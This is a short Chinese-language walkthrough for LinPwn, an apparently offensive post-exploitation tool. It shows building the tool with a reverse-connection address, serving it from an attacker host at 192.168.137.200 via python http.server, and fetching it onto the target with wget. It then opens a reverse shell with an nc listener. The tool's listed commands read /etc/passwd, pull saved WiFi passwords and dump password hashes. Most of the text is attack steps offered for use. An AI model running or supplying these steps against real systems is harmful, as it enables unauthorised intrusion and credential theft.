LinPwn是一款交互式的后渗透阶段枚举和提权辅助工具。
Github:https://github.com/3XPL017/LinPwn
编译
克隆源码
git clone https://github.com/3XPL017/LinPwn.git
编辑LinPwn.cc文件,修改反弹连接IP及端口,然后必用build.sh编译
cd LinPwn
vi LinPwn.cc #编辑反弹IP及端口
bash build.sh --default #编译
上传LinPwn文件到靶机
编译成功后,文件夹下生成一个LinPwn,该文件上传到靶机上执行。
攻击端使用Python3开启一个HTTP服务
#攻击端IP为192.168.137.200,HTTP服务开启在8000端口
python3 -m http.server 8000
靶机上使用Wget下载文件
wget http://192.168.137.200:8000/LinPwn
连接
攻击端使用nc监听
#监听在1024端口,与LinPwn.cc中修改的端口保持一致
nc -lvp 1024
靶机上运行LinPwn
chmod _x LinPwn
./LinPwn
连接成功后,攻击端收到返回的系统信息
使用
-
shell - 执行靶机上的/bin/sh
示例: (LinPwn: Shell) > id
输入 exit 返回到 LinPwn. -
readfile - 读取文件内容
示例: (LinPwn: ReadFile)> /etc/passwd
输入 exit 返回到 LinPwn. -
enumerate - 运行 LinEnum.sh
示例: (LinPwn) > enumerate
LinEnum运行结果显示在靶机上,辅助提权,偶尔不成功,可尝试多运行几次。
默认从Github上下载LinEnum.sh文件,国内网络或者内网使用可能下载不成功,可以修改LinPwn.cc代码中下载链接为攻击段地址,攻击端开启HTTP服务提供文件下载。
-
download - 下载文件到靶机
示例: (LinPwn: Download) > https://exampleurl.com/file_to_download -
wificredz - 获悉靶机上保持的Wifi密码
-
hashdump - 获取系统密码Hash